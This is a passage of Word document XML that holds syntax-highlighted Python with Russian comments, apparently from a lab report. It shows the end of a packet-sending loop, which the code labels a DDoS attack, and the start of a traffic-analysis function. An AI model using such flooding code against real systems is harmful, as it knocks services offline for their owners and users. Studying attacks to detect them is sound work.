          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB07695" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>verbose</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C206A7" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="005F1B9E" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Отправлено</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packets</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>пакетов</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F85E3F2" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Задержка между отправкой пакетов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86AC5B" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"DDoS-атака завершена"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8EF90B" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF520F7" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Функция для анализа трафика</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FE9B3F" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>analyze_traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A966880" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
